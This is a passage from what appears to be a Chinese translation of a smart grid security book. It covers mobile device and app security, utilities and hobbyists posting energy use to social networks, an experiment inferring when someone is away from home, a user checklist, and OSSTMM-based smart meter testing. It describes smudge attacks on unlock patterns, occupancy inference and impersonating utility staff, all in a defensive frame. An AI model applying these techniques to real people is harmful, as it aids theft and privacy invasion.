的发布版本上都支持。 10.5.4 屏幕锁 大多数移动设备在授权对设备的访问前,需要输入用户名/密码组合、PIN 或 其他验证凭证。从一个机构的角度看,移动设备应该遵循包含屏幕锁的策略。典型地,这项策略的要求如下: ● 屏幕在5min 到15min 的无交互后会自动锁住 ● 当不再使用系统时,用户可以手动锁住屏幕 ● 屏幕解锁需要验证 对于移动设备如手机和手持设备,这些设置是可以配置的;但是,管理起来就比较困难。在 Windows 系统上,设置组策略的设备就会自动实现屏幕锁策略。其 他设备不支持集中式管理,必须手动配置。另外,有些设备输入困难,用户如果想 输入一个复杂的密码会发现很困难。因此, 一些用户也许会选择比较容易输入的 密码/PIN 组合,当然也比较容易被破解。 移动设备上的屏幕锁可能会被攻击者以多种方式破解,因此不应该成为唯一 的保障。例如, 一些触摸屏移动设备由于手指留下的污痕而存在风险。用户手指 渗出的油污会留下指纹印的轨迹,泄露密码/PIN 的字符。攻击者就可以尝试这些 字符的各种不同组合来解锁。被配置成用解锁模式来进行屏幕解锁的设备,对攻 击者来说更容易破解。例如,Android 手机被配置成使用触摸屏上显示的九个点 的解锁屏,用户必须用这九个点画出某个模式来解锁。[15]模式可以是满足以下限 制的任何线条: ● 必须用四到九个点 ● 一个点只能被用一次 ● 除非某个点已经被用过,否则不能被越过 ● 点之间的线可以是水平的、垂直的、对角的或者和国际象棋里的骑士移动 的方式相似[16 图片10.1到10.4显示了符合这些限制的解锁模式的例子。考虑那些喜欢选 简单密码的用户,他们的模式选择很可能就是一条只有两个不同端点的直线,像图 10.1和10.2显示的那样。本章的例子中,端点指的是只有一条线与之相连的点。 在图10.1中,左上方和右下方的点就是端点。如果画模式时在屏幕上会留下污痕 的轨迹,对10.1和10.2来说,只有两种可能的解锁组合。在这种场景下,攻击者 只需要从一个端点开始,沿着污痕轨迹,直到他们到达另一个端点。如果这样不 行,另外一种可能的组合就是沿着相反的方向追踪。即使用户选择一个更复杂的模式。画模式时也许会留下一条只有几种不同组合的污痕轨迹。图10.4里的模式稍微复杂些,有 四个潜在的端点和24种可能的解锁模式;然而,尝试24种组合不会花费很长 时间。 10.5.5 清空设备 移动设备在经历一定次数的失败认证尝试后,安全地清除其上的所有数据,可 以减缓“屏幕锁”一节提到的攻击。这个次数一般设定在5到10次之间。考虑到 用户在较小键盘的移动设备上也会输错他们的密码,建议次数不要设定为小于 5次。 另外,远程清空移动设备的功能有助于降低偷盗造成的风险。 一些商业解决 方案可以使管理员在移动设备丢失或被偷后远程进行清空。另外,部分方案提供 了 phone-home 功能,通过 GPS 信号提供的坐标,设备的主人可以获悉设备的 位置。 警告 清空设备可以降低好几种攻击方案造成的风险,但只能作为安全措施的最后一道 防线。在远程清空设备的情况下,攻击者可以在他们偷窃该设备到用户报告设备 丢失的这段时间内就获得存储在主机上的敏感数据。因此,清空移动设备也许只 是清除敏感数据的复本。本章中讨论的每项安全控制措施应该只是深度安全防护 措施的一部分。 一些攻击者可能对访问敏感数据不感兴趣,只是想把他们的情绪发泄到你的 财产上造成破坏。另外,攻击者可能是移动设备所有者的狗,使主人跌倒并摔坏了移动设备。更常见的情况是,公用事业公司的维修人员也许需要在恶劣暴风雨的 天气中工作,他们的移动设备会受到雨和碎片的严重撞击。 不管哪种场景,总会出现移动设备上的数据变得不可用的情况。恢复数据是 可能的,但如果机构或消费者拥有移动设备的备份,他们可能不需要经历试图从毁 坏的存储硬盘里恢复数据这样痛苦的过程。对于手机和PMP, 大多数同步应用程 序提供将移动设备的数据备份到主机的功能。当用户的移动设备上的数据被删除 或变得不可用时,他们会发现这项功能很好用。 10.5.7 取 证 取证在非移动系统上就已经是个困难的过程,但有项工作有助于调查过程,那 就是记录详细的日志。将敏感数据的访问应该记录下来,在事故发生时可以给取 证过程提供帮助。尽管不是每个移动设备都有日志功能,有日志功能的设备应该 要启用此功能。想了解移动设备取证的更多信息,请参考NIST SP 800-101:手机 取证指导。 10.5.8 教 育 用户总是安全方面最脆弱的环节,因此对移动设备用户进行教育显得尤为重 要。当用户把移动设备留在车里去买杯咖啡或去厕所时,这些设备经常会被偷。 因此,应该进行至少每年一次的常规培训,强化安全意识的重要性,培训包括如下 内容: ● 在不安全的环境里,不要把移动设备放在不触手可及或看不到的地方 ● 手动锁住屏幕,注销,或者关机 ● 不要访问移动设备上的不受信任网站或打开来自陌生 e-mail 地址或陌生 号码的信息 ● 经常备份设备 10.6 移动应用程序安全 在大多数情况下,移动应用程序被设计为标准应用程序的接口。移动应用程 序处在标准应用程序和移动客户端之间,负责处理移动客户端和标准应用程序之 间的通信。当然也有单独开发移动应用程序的例外情况,但安全控制措施是一 样的。 10.6.1 移动应用程序安全控制措施 移动应用程序开发商犯的最大的错误之一就是认为只有移动设备才与移动应 用程序打交道。假设移动应用服务器是可以通过网络访问的,任何可以访问该网络的系统都可以攻击该应用服务器。因此,让我们再次以雪佛兰福特旗舰版移动 应用程序为例。用户可以在任何地方用iPhone、黑莓、安卓或大部分移动 Web 浏 览器远程控制他们的雪佛兰福特的特定功能。[]为了提供这种级别的访问,移动应 用服务器应该是可以通过网络访问的。因此,任何有因特网连接的系统都可以攻 击该应用服务器。 移动应用程序需要对抗针对传统应用的攻击,包括在第7章“攻击公用事业公 司”中描述的那些。下面的资源针对如何开发安全的应用提供了详细的信息: ● 开源 web 应 用 安 全 计 划(Open Web Application Security Project, OWASP)-www.owasp.org ● Web 应用安全联盟(Web Application Security Consortium,WASC)- www.webappsec.org 警皆 你可以从OWASP 前十条(www.owasp.org/index.php/Category:OWASP_Top_ Ten_Project)开始了解移动应用程序面临的攻击类型。许多机构把 OWASP 前十 条作为评估他们应用安全状况的唯一标准,并且只关心列表中的那十个条目。 OWASP 前十条的目的是提高大家对前十种 Web 应用安全漏洞的警觉,[17]因此它 并不是一个全面的列表。 10.6.2 加密 在开发移动应用程序时,把加密功能转嫁给网络供应商是大家喜欢的做法。 例如,如果开发商只是打算支持手机,他们认为蜂窝网络会在传输中加密数据,所 以再使用SSL 加密就是一种对资源的浪费。然而,第7章“攻击公用事业公司”,讨 论了针对GSM 网络中的加密方法的攻击。另外,大量的手机现在使用Wi-Fi,因 此甚至都不能保证手机一定会用移动网络和移动应用服务器通信。做上面提到的 这些假设可能会导致应用的重大缺陷。 10.7 总结 移动应用程序和设备将会广泛用于增强智能电网的功能和访问方式,这也是 为什么它们会给智能电网带来更大的风险的原因。它们为攻击者穿过机构的物理 和虚拟外围安全控制提供了一个渠道。另外,它们会为攻击者威胁用户安全提供 一种新的攻击途径。 由于平台及应用的多样性和固有的移动性,移动设备管理起来更困难,通常无 法进行集中管理。这就更需要个人用户落实安全实践措施,比如屏幕锁和经常备份。然而,应用程序将面临类似的攻击,机构应该已经对这些攻击做好了准备。通 过实现本章提到的安全控制措施,组织机构可以显著降低移动应用程序和移动设 备给他们的安全状况带来的风险。 社交网络和智能电网 随着 Facebook 成为因特网上第二大访问站点,智能电网会在社交网络网站上 安家是预料中的事。 从 Twitter.com 到 Blogger.com, 智能电网已经在利用社交 网络的优越性。在本章,我们将会梳理智能电网技术是如何整合到社交网络站点 的,也会讨论随之带来的安全风险。 11.1 智能电网更社会化 一些因素促使了在智能电网中应用社交网络。智能电网的目标之一就是使顾 客能持续获悉他们消耗了多少能源。随着越来越多的人使用社交网络服务,社交 网络可以提供一种顾客更满意的方式。智能电网利用流行的社交网络网站也有商 业方面的考虑。技术供应商的市场部可以广而告之他们支持的功能有多全面,公 用事业公司可以宣传他们使用了社交网络。 迄今为止,智能电网技术已经选择 Twitter 和 Facebook 作为他们的社交网 站。Facebook 提供了庞大的用户群,也支持定制应用的开发,而 Twitter 为更新提 供了很好的平台。让我们来评价一下利用智能电网技术在Twitter 和 Facebook 的现行使用情况吧。 11.1.1 Twitter 对于正在读这本书的你们,如果你不知道 Twitter 是什么,那请看 Twitter 向世界做的自我介绍:Twitter 是由全世界的人支持的实时信息网络,让你可以分享和发掘正在发生 Twitter 是一个允许用户一次发送最多140个字符的消息的微博网站。微博 可以由连接到因特网的任何类型的设备通过各种客户端应用或直接通过 Twitter 的网站发布。Twitter 的用户可以关注特定的个人、组织、团体或者在微博里搜索 特定领域。“井字标签(#)”用来把微博与特定事件联系起来。例如,#syngress 是这本书的出版商的“井字标签”。 Twitter 成功的部分原因是用户可以通过其他用户发布的消息实时追踪事件。 这种实时信息共享使得Twitter 可以成为智能电网技术的完美工具。 1)在 Twitter 上发布能耗信息 当我在写本章时,在 Google 上对“site:twitter.comkWhUsage”进行简单的 查询,有超过128条的结果。我肯定当你读这本书的时候,这个数字会显著增 加。让我们来看一下一些正在使用Twitter 广播他们的能耗信息的个人和商 业组织。Andrew Jones,Alquist 咨询公司的经理,决定用 Twitter 展示他们公司致力于减少碳排放量。通过他们的 Twitter 页面,http://twitter.com/AlquistARJ, 人们可以监控 Alquist 大楼的能源消耗情况。不像许多其他人用kWh 帖出他们的能 源消耗,Alquist 的 Twitter 提供的是基于花费的使用数据。Alquist 的微博还通过 发到 TwitPic.com 的代表花费数据的图形,使人们以另一种形式获悉消耗数据。 IBM 的 Andy Stanford-Clark 利用 Twitter 提供他家能源使用的实时信息。 Andy 除了简单地发布自己是打开还是关上了家里的室外灯,他还发布其他和能源 相关的信息如现在电表的读数,像下面的图11.2显示的那样。为什么停留在简单 地发布信息呢?显然 Andy 没有。通过定制的软件,Andy 确实可以在网上发送命 令控制家里电灯的开与关。 尽管 Andy的这个特别的设置比其他的智能电网社交网络的解决方案要先 进,但由此可以预见社交网络和智能电网的未来。公众现在可以使用更简单、更友 好的方案来发布他们的能源使用情况。要了解更多信息,请访问Andy 的网站 ht- tp://sta-ndford-clark.com/andy_house.html。 2)Tweet-a-Watt 这些方案之一叫做“Tweet-a-Watt”, 如图11.3所示。尽管 Tweet-a-Watt 现 在需要一些硬件改装,但它们很容易组建和装配。 一个 Tweet-a-Watt 包括一个由 XBee无线适配器组装的 P3 国际“Kill-a-Watt” 设备。XBee 无线适配器利用 Zig- bee 无线技术,要求接收器应插入连接到因特网的设备中。Xbee 转换器连接到 Kill-a-Watt, 以千瓦时向接收器发送能源使用数据,接收器然后用连接到因特网的 设备向 Twitter 发布能耗信息。 注意 你可以从 www.adafruit.com/index.php?main_page=product_info&.cPath= 328.products_id=143&.zenid=6d1306727167af57allc948993eObedc 上购买一个 自助 Tweet-a-Watt 工具包。注意Kill-a-Watt 并不包括在工具包里。你可以从当 地的五金店或你最喜欢的网上电子商店购买 Kill-a-Watt。 并不是每个人都看好 Tweet-a-Watt。《财经内幕》的 Graham Winfrey 把 Tweet-a-Watt 包含进了他在2009年12月发表的“十大最笨绿色装置”[3]列表中。 Winfrey 并没有详细说明为什么他把该装置放到列表里,但暗指它只是一种吹嘘 绿色生活的方式。也许他应该提及发布你的能源消耗所涉及的隐私方面的问题。 3)智能电表和宽带集成 在非管制的能源市场中,消费者可以从众多公用事业公司中选择满足他们的 能源需求的公司。通常,顾客基于价格和可靠性选择他们的能源提供商。不过,一些公司正试图利用流行的趋势在能源市场中竞争。德国的一家公用事业公司,Yello Strom(www.yellostrom.de/),已经开发并销售了采用消费者的家用宽带连 接的智能电表。这就使得 Yello Strom可以开发以消费者为中心的应用,例如他 们的 Twitter 应用。 本质上,该应用是通过为智能电表创建一个 Twitter 账户而工作的。然后,每 隔一段时间(比如,每10min), 智能电表通过消费者的家用宽带连接发布能源使用 情况。[1大多数公用事业公司在把数据发送给服务提供商之前,都会先把数据发送 给后台办公室进行处理,这样会造成明显的延时[1直接把智能电表连接到消费者 的宽带会加快向消费者提供信息的速度。 11.1.2 Facebook 如果在读这本书的读者中只有3个人没听说过Twitter, 那我猜他们中只有2 个人不知道 Facebook 。对于不知道 Facebook 的人,据 Compete.com 的统计,Fa- cebook 是因特网上最大的社交网站。[5]自2007年5月24日以来,Facebook 允许 第三方为其网站开发应用程序,用户可以玩游戏、分享信息甚至追踪能源使用 情况。 1)PICOwatt Tenrehte 科技,纽约州曼彻斯特市的一家初创公司,是最先开发允许用户远程 监控他们的能源使用情况的 Facebook 应用的公司之一。Tenrehte 的应用将利用 他们的 PICOwatt 技术,包括在公用事业公司推广部署智能电表之前冲击市场的 消费者产品。 PICOwatt, 如图11.4所示,是带Wi-Fi 功能的智能插头,它对消费者使用的传 统电源插座进行了功能增强。这些智能插头本质上是软件驱动的设备,能提供实 时能源使用监控和设备控制。理论上,消费者会在家里安装 PICOwatt, 然后通过 PICOwatt 内置的 Web 服务器或是通过 Tenrehte 的 Facebook 应用整合数据。随 后,PICOwatt 的用户就可以知道设备消耗的能源量,并可以决定什么时候打开或 关闭设备,以减少他们的电费。在写这本书的时候,Tenrehte 计划在2010年4月 以低于$125的价格发行 PICOwatt 。 注意 关于 PICOwatt 的监控能力,如果你想先睹为快,可以访问Tenrehte的模型网站 http://airlock.tenrehte.com/aps/watt/PICOwatt.cgi?btnG=PICOsta- tus 。在这里,你可以查看有关设备状态、能源使用、价格的信息以及管理控制 选项的接口信息,这些选项负责设备启 动和关闭及其他可能的操作。 2)智能同步 智能同步有限责任公司,位于美国密西西比州杰克逊的一家智能电网基础设 施公司,也正在使用社交网络向公众提供能耗监控功能。在2009年8月27日,智 能同步公司和密西西比大学联手,将使用该公司的智能电表“降低校园大楼的能源 消耗,同时在 Facebook 、Twitter 和 RSS feeds上向大众发布实时结果”。在其新闻发布会上,智能同步公司声明密西西比大学的每栋大楼上都会装有 公司的智能电表,并且每栋大楼都在 Facebook 上有主页。这些主页将为感兴趣的机构提供能源消耗情况之类的信息以及比较分析结果。密西西比大学最初部署了 16个该公司的智能电表,并正在考虑后续的更多部署 WattsUp 的设计使用了DIY KYOTO的 Wattson 能源使用监控设备。Watt-son包括一个转换器和接收器(被DIY KYOTO作为了显示器)。转换器 中有一个传感器片,该传感器片连接到你家的电表盒和保险丝盒之间的主电缆上。 然后能源消耗信息被无线地传给接收器,接收器以瓦特值和花费值显示信息。接 收器根据你的消耗情况改变颜色:蓝色是低耗、紫色是中耗、红色是高耗。要获得 历史信息,以及向 WattsUp Facebook 应用发送反映使用情况的数据的能力,需要 通过USB 连接接收器和 DIY KYOTO 的家用软件。更多 Wattson 的信息,请访问 www.diykyoto.com/uk/wattson/about, 要了解 WattsUpFacebook 应用,请访问 www.facebook.com/apps/application.php?id=50473167243。 11.2 社交网络威胁 我们已经讨论了一些最新的智能电网技术对社交网络的使用,现在让我们关 注随之而来的威胁。从简单的信息泄露到相连设备的完全失控,智能电网技术对 社交网络的使用带来了各种威胁,也产生了不同程度的影响。 11.2.1 信息泄露 我们在第2章“面向消费者的安全威胁与影响”中讨论过,信息泄露是智能电 网中的最大威胁之一。与社交网站的结合进一步增强了这种风险,因为从本质上 说,社交网络就是一种用于和他人共享信息的方式。最近的几次社交网络中的重 大失误对使用社交网络的智能电网技术产生了直接影响。 2010年2月17日,网站 www.pleaserobme.com 在博客圈引起了很大的关 注,将安全社区早就开始担心的问题带入了公众的视线。由 FortheHack.com 的 人员提出概念并设计的 Please Rob Me 收集 Twitter 上人们何时不在家的信息。 具体来说,该网站依赖于 Foursquare(http://foursquare.com) 因特网应用的用户 发布的微博信息构建。Foursquare 允许用户通过智能手机向 Twitter 和 Facebook 上发布他们的现在位置。图11.9是被 PleaseRobMe 截获的 Foursquare 用户信息 的例子。 巧合的是,这个网站的作者和 Please Rob Me有相同的主意,但我们的只是针 对那些在 Twitter 上发布他们的能源使用情况的用户。实验伊始,Tony 为自己的 公寓买了三个 Tweet-a-Watt 设备,Justin 写了一些利用Twitter 的 API 的 Perl 脚 本,可以捕获 Tony 的能源使用情况。实验的目标是 Justin 能不能仅根据 Tony 的 能源使用情况,准确地判断 Tony 什么时候在家,什么时候不在家。为了验证实验 结果,Justin 会在他认为Tony 不在家的时候给 Tony 打 电 话 。Justin 在一周内只 能给 Tony 打5次电话。在继续实验之前,Justin 认为在判断 Tony 什么时候在家 或不在家这件事上他会百分之百的正确,也就是五次尝试都对。Tony 则认为百分 之百正确是难以达到的,他认为Justin 在判断自己什么时候不在家时会百分之八十的正确,或者说是5次尝试有4次正确。Justin 提醒Tony 他不能为了让自己误 判而更改能源使用。Tony 勉强答应了。 为了完成任务,Tony 做了一些调整,让他的3个 Tweet-a-Watt 都向他家里的 一个本地服务器发送信息。服务器会捕获并整合来自于3个 Tweet-a-Watt 的信 息,并每隔5min 在 Twitter 上发布一次。不像前面提到的在Twitter 上发布能源 使用情况的例子,Tony 对他家的Twitter 账户实施了保护,使得只有Justin 的服 务器账户可以访问那些信息。 提 示 如果你也想体验一把社交网络/智能电网,我们建议你为住所或者设备创建单独的 Twitter 账户。然后,像 Tony 一样保护你的账户,只允许那些你同意的账户监控 你的能源使用。这样会降低我们在这里强调的风险,以及那些给 Please Rob Me 带来便利的风险。 在三周的时间内,Justin 的 perl 脚本捕获了 Tony 的微博,并通过几个简单的 MySQL 查询挑拣得到了数据。利用这些信息,Justin 可以对 Tony 的能源使用情 况进行归类估计。这些归类如下: ● 在家—能耗明显超出平均值,表明 Tony 正在使用一些高耗能的设备如加 热器、洗涤及烘干机、洗碗机和电视。 ● 不在家一能耗明显低于平均值,表明 Tony 没有使用一些高耗能的设备如 加热器、洗涤及烘干机、洗碗机和电视。 ● 睡觉—能耗低于平均值,但高于他的底线。这个分类表明 Tony 正在使用 家里的最基本的必需品,如加热器。 ● 未知—能耗接近或处于Tony 的平均水平。 得到满足以上四种能源使用分类之一的能源使用情况并不简单地意味着 Tony 在不在家。实验过程中,Justin 在给 Tony 打电话进行5次尝试中的一次之 前,需要满足几个额外的标准。第一个标准是 Tony 的能源使用满足某个分类的 时间应持续30min以上。换句话说,既然 Tony 设置的是每隔5min 发布一次他 的能源使用情况,Justin 的脚本应该在6次连续的发布都符合“不在家”这一类时 才提示他。第二个标准是“常识”因素。当Justin 的脚本告诉他 Tony 可能不在 家时(意味着Justin 的服务器监测到了至少连续6次的发布都符合“不在家”这 一类),Justin 会自己查阅 Tony 在过去的1h 的能源使用情况。查阅这些以前的 信息是为了判断 Tony 的能源使用是否有反常,以免产生误报。Justin 还要考虑 一天中的时刻和一周中的哪天。工作日的白天和周末的晚上,很明显是 Tony 不 在家的时候。如果在这些时间段内有提醒被触发,Justin 相信 Tony 不在家的可 能性很大。 实验的结果是,Justin 对 Tony 不在家的判断5 次尝试都是正确的,或者是百 分之百的正确。Tony 认为 Justin 选了最恰当的时机进行尝试,如周五晚上和周天 早上,但Justin 认为怀有恶意的人也会利用这些时机。Justin 还认为监控 Tony 的 能源使用只是提供了一些补充信息,这些信息与常识(或是我们上面提到的第三个 标准)结合起来增加了判断正确的可能性。 那么从作者的实验中我们可以学到什么呢?发布你的能源使用情况会让你 更容易遭受抢劫或其他犯罪活动吗?作者认为不安全的发布确实会让你更容易 受到侵害;然而,你的信息被其他人利用的风险是很低的。不过,像 Please Rob Me员工一类的人将这些监控信息收集整合起来的话,风险就提高了。总的来 说,这本书的作者确实看到了发布你的能源使用情况的益处,但想强调一下本章 先前提到的建议:确保你保护了你的微博,只允许你想让看到这些信息的用户 访问。 警告 关于使用 Twitter 和 Facebook 的一条简单的警告。许多第三方的 Twitter 和 Fa- cebook 应用都默认让你用不安全的连接登录,如 HTTP 。 如果你用这些第三方 应用中的任何一种连接到 Twitter 或 Facebook, 确保你正在用安全的协议传送登 录凭证或者联系应用的作者要求实现这项功能。另外,社交网站本身也有漏洞, 攻击者会把这些网站作为攻击目标。要了解更多关于如何确保第三方服务安全 的信息,参考第9章“第三方服务”,该章描述了如何降低第三方服务带来的 风险。 11.3 智能电网社交网络安全清单 一些智能电网设备和社交网站进行结合,如 Facebook 和 Twitter, 为了保护使 用这些设备的用户的安全,本书的作者建立了一份智能电网社交网络安全清单。 这份清单的目的是提供给终端用户一系列的基本控制措施,如果用户实现了这些 措施,就可以得到最基本的安全保障。智能电网社交网络安全清单会继续完善,本 书的作者建议访问本书的相关网站,www.fyrmassociates.com/securingthesmart- grid 获得清单的最新版本。 11.3.1 在你开始前 在开始实现你的智能电网/社交网络设备方案之前,你必须首先明确你想从你 的实现方案中获得什么。你是想简单地远程监控你的设备还是想和朋友、同事或 者每个人分享你的信息。明确你想从你的实现方案中达成什么目标将会指导你需 要实现以下的哪些控制措施。 11.3.2 基本控制措施 智能电网社交网络安全清单为基本安全控制措施列出了五个类别。这几类 如下: (1)身份 (2)认证 (3)信息共享 (4)网络 (5)使用 1)身份控制 为了防护你对智能电网/社交网络设备的使用,应该实现下面的控制措施。 ● 账户名-使用一个不容易识别出你或者你的设备的账户名。例如,如果你 配置一个 PICOwatt 设备,不要把你的设备命名为“Justin-BedRoom-Pico- Watt。”选择一个不明显的称呼如“JsPil” 。 尽管这是不公开即安全原则的 典型例子,但这可以阻止你被查询绑定社交网站的智能电网设备的简单 Google 搜索识别出来。另外,避免使用你的用户e-mail 地址账户 ID。例 如,如果你的 e-mail 地址是 jtothemototheho@gmail.com, 不要把设备命 名为jtothemototheho。 ● 个人信息—不要在账户中放不必要的信息。尤其不要把基于位置的信息 放到账户中。如果你为你的智能设备建了一个 Facebook 主页,你可能不 用上传所在城市、州或者设备的图片。 2)认证控制 ● 安全登录—当你的智能电网设备连接到社交网站时,确保使用的是安全协 议,如 HTTPS 。 本章先前的一个警告提醒我们一些第三方应用使用HT- TP 而不是 HTTPS 传送你的登录凭证。确保使用安全协议提交登录凭证 至社交网站可保护你设备上的社交网络账户。另外,确保应用程序也能安 全地传送你的会话凭证。只要你现在的登录会话有效,你的会话凭证比如 会话 cookie, 就是你的登录凭证。 ● 独一无二的密码—除了符合标准复杂度的要求,应为每个社交网络账户选 择不同的密码。避免用其他账户使用的密码,如你的e-mail 账户。如果有 人入侵了你的 email 账户,那他也可以访问你的社交网络账户。 ● 密码共享—尽管不要和其他人分享你的密码的传统建议仍然适用,但你也 不要把你的其他账户密码告诉社交网站。例如,Facebook 允许你输入你的 e mail 地址和e-mail 账户密码来自动识别你的e mail 账户地址簿里的朋友。 ● 密码保护问题—把相同的密码安全控制措施应用到密码保护问题上。 一 些社交网站使用密码保护问题,如你的母亲的少女名字是什么或者你最喜 欢的餐馆是哪家,来提供额外的安全防护或者是更改你忘记的密码。问题 是这些信息经常可以通过阅读你的社交网络个人简历获得。通过选择复 杂的和独特的答案(实际上是错误的答案),你可以让其他人不能很容易地 猜出你的答案。 3)信息共享控制 ● 隐私—在对你的智能电网设备社交网络主页进行设置时,确保你设置成了 “私有”。这会阻止任何人查看你的智能电网设备信息更新。 一旦你把主 页设置成了“私有”,只允许那些你希望可以查看你智能电网设备信息的人 (或账户)访问。对于 Facebook 和 Twitter, 想要查看智能电网设备更新的 用户账户必须发送请求。 ● 第三方应用共享—避免使用任何不必要的第三方应用。社交网站大力支 持附件应用的开发。当你打算用这些附件应用时,应用会试图访问你主页 里的信息,从而把你的信息暴露给第三方。 4)网络 ● 隔离—在你的局域网内安装智能电网设备时,把它和你家其他的网络设备 隔离。这可以通过防火墙的访问控制列表或是通过有访问控制列表的交 换虚拟局域网实现。隔离智能电网设备可以在你的智能电网设备被入侵 时,阻止对其他设备的未授权访问。 5)使用 ● 浏览—当你登录社交网络账户时,避免浏览其他社交网络主页或网站。 另外,在浏览其他网页前,要注销并关闭浏览器。在登录时严格限制你 的浏览习惯,这有助于避免针对你的社交网络主页的跨站请求伪造 攻击。 11.4 总结 像 Facebook 和 Twitter 这样的社交网站永远地改变了我们使用因特网的方 式。对社交网站无处不在的访问也永远地改变了我们利用社交网站的方式。智能 电网设备和社交网站的结合是有意义的一件事。然而,必须对新出现的威胁进行 预防和监控,才能保证他们的结合是正确的。 使用社交网络最主要的目的是和其他人分享信息,而维护隐私和安全依赖于 终端用户自己。利用和社交网络结合的智能电网设备需要额外的维护以及终端用 户的警觉,以便降低使用这些设备和服务带来的风险。 和智能电网以及社交网站相关联的风险一直在加剧。不过,采取基本的安全 控制措施可以使用户获得一个基础的安全等级。本书的作者相信上面提到的智能 电网社交网络安全清单可以让用户采取这些基本的安全控制措施并获得一个基础 的安全等级。不过,随着智能电网设备和社交网站不断增加新功能,新的威胁和攻 击肯定会接踵而至。因此,终端用户应对这些新的威胁和攻击保持警觉,并采取适 当的控制措施。 攻击智能电表 12.1 开源安全测试方法手册(OSSTMM) 我们将要探讨并且应用到测试智能电表安全的第一个方法是开放性安全研究 社团(Institute for Security and Open Methodologies,ISECOM)的开源安全测试 方法手册(OSSTMM) 。ISECOM 是一个在2001年1月成立于美国和西班牙的非 盈利机构。ISECOM 的目标是提供安全警示、调研、认证和商业完整性解决 方案。 ISECOM 的《开源安全测试方法手册》为它的用户提供了一套执行安全测试的 同行评议方法。 |OSSTMM 共六章,涵盖了包括网络、无线设备和物理安全在内的 安全的方方面面。在这些安全方面上(网络、无线设备和物理安全),对智能电表进 行安全测试时,应用OSSTMM 是比较容易的。然而,OSSTMM 的其他方面如个 人安全意识水平,适用于测试公用事业公司整体的安全态势,这些与智能电表安全 没有直接的联系,因此我们在本章中就不讨论它们了。 注意 在写这一章的时候,ISECOM的 OSSTMM 的版本是2.2。不过,当时《开源安全测试 方法手册》的第3版正在制定中。本书的作者建议你在测试智能电表之前先访问 ISECOM的网站 www.isecom.org, 获得并阅读《开源安全测试方法手册》的最新版本。 ISECOM 的《开源安全测试方法手册》的6个章节如下③]: (1)信息安全 (2)过程安全 (3)因特网技术安全 (4)通信安全 (5)无线安全 (6)物理安全 对 ISECOM 的 OSSTMM 的大部分分析都将集中在第3、5和6章,分别是因 特网技术安全、无线安全和物理安全。对于 OSSTMM 的其他章节我们会做一个 总结,但建议读者最好查阅一下。 按照OSSTMM 进行安全测试时,每章里包含的每个模块都必须测试到。不 过,没有用到的模块可以简单地标注出来。ISECOM 提供了一份 OSSTMM 数据 表单,用于OSSTMM 安全测试操作;然而,基于本书的目的,我们将不会使用这份 文档。这份文档最好是在对具体目标进行实地测试时使用,而不是在讨论方法和 怎样利用这些方法去攻击智能电表的时候使用。 ISECOM 的 OSSTMM 讨论了执行安全测试的许多方法。OSSTMM 特别列 出了六种常用的安全测试方法,从 Double Blind,即在执行测试前不提供信息给目 标和攻击者,到 Tandem, 即目标和攻击者公开地共享关于测试的信息。3]基于本书 的目的,我们将在 Double Blind 安全测试方法的模式下讨论 OSSTMM 。因为这种 方法最接近于恶意攻击者的方法,所以我们选择此法。 提示 虽然对 ISECOM 的 OSSTMM 和如何应用它攻击智能电表的讨论主要是针对 Double Blind 方法,但本书的作者并不建议智能电表制造商或公用事业公司在对 他们的智能电表进行测试的时候,使用这种方法。尽管 Double Blind 方法很贴切 地模仿了由对智能设备的安全控制措施不了解或只有很少了解的外部人员发起的 攻击,但它并不是最有效率最有效果的安全测试方法。本书的作者认为智能电表 制造商或公用事业公司应该采取的最有效率最有效果的方法是 Tandem 安全测试 方法。Tandem 方法中因为有关环境的信息在测试者和目标之间是公开共享的, 所以能节省不少时间。类似地,信息的共享也有助于安全测试的效果,可以让测试 者确认他们的范围和验证他们的假设。相比其他测试方法,如 Double Blind,智能 电表制造商或公用事业公司采用 Tandem 方法进行安全测试的结果是,可以得到一份更完整和更准确的报告,并且很有可能在安全测试上花费较少的钱。 为了更好地理解《开源安全测试方法手册》是如何被应用到攻击智能电表上 的,让我们深入地查阅一下每个可以应用的章节。 12.1.1 信息安全 OSSTMM 的信息安全这一章节包括八个模块。这八个模块如下[3]: (1)态势评估 (2)信息完整性审查 (3)情报调查 (4)因特网文件粉碎 (5)人力资源审查 (6)竞争性情报侦查 (7)隐私控制审查 (8)信息控制审查 警告 当你查阅OSSTMM 的2.2版本时,你可能会注意到每章列出的模块和每章里详 细阐述的模块并不匹配。这是因为OSSTMM 的2.2版本是从2.0版本到3.0版 本之间的一个过渡。因此,本书的作者建议你依照详细讨论的模块,完整地列出每 个可用模块的可用任务列表。 从更高层次上来看,OSSTMM 的信息安全这一章主要是针对信息收集和验 证。从攻击智能电表的角度看,这包括获得和查阅被攻击的智能电表的特殊构造 和模型的信息。查阅信息的显而易见的选择是智能电表制造商的网站,还有安装 和使用智能电表的公用事业公司。 比如,通过简单查看佛罗里达电力和照明公司网站上的问答部分,你可以获得 这样一些关于他们的智能电表的信息: (所用)技术是基于IP 的 RF 网格。RF 性能是指电表通过无线电频通信。每 个电表都装备一个双向的900MHz 的无线电传送器,用来向同样是无线电装备的 接入点发送和接收信息。接入点负责收集传回FPL 系统的电表信息。每个接入 点一般都挂载在电线杆上,有一个鞋盒那么大,可以处理成千上百个电表的通信。 新的RF 网格技术扩展了电表与接入点之间的通信能力,允许信号由其他电表中 继传送以寻得路径,但同时要维持通信所需的连接。在 OSSTMM 的信息安全章节讨论的信息收集、评估和验证是任何成功攻击 的基础,必须执行这些环节以便能了解和确定在下面的章节中要用到的攻击途径。 提示 Google 是获得任何目标信息的有用资源,包括智能电表。安全研究员 Johnny Long 的书 Google Hacking for Penetration Testers 已经出了两版。在这些书里, Johnny 讨论了如何利用Google 获得对任何入侵测试都至关重要的信息的方法。 Google Hacking for Penetration Testers,卷 2(ISBN:978-1-59749-176-1,Syngress 安全丛书)可以在这看到 www.syngress.com/hacking-and-penetration-testing/ Google Hacking for-Penetration-Testers。 12.1.2 过程安全测试 ISECOM 的《开源安全测试方法手册》的第2章主要是测试你的目标的过程安 全。OSSTMM 的过程安全测试一章包括如下5个模块4]: (1)态势审查 (2)请求测试 (3)逆向请求测试 (4)指导建议测试 (5)信任人员测试 ISECOM 的 OSSTMM 的过程安全测试一章涵盖了被称为“社会工程”的内 容。过程安全测试一章内的五个模块的目标都是通过强迫或欺骗别人而获取信 息。攻击智能电表的社会工程可能包括冒充公用事业公司的技术人员或消费者。 如技术规范或者是管理者凭证、消费者凭证等有用信息很有可能通过社会工程技 术获得。OSSTMM 的过程安全测试一章包括的模块可以验证信息安全一章获得 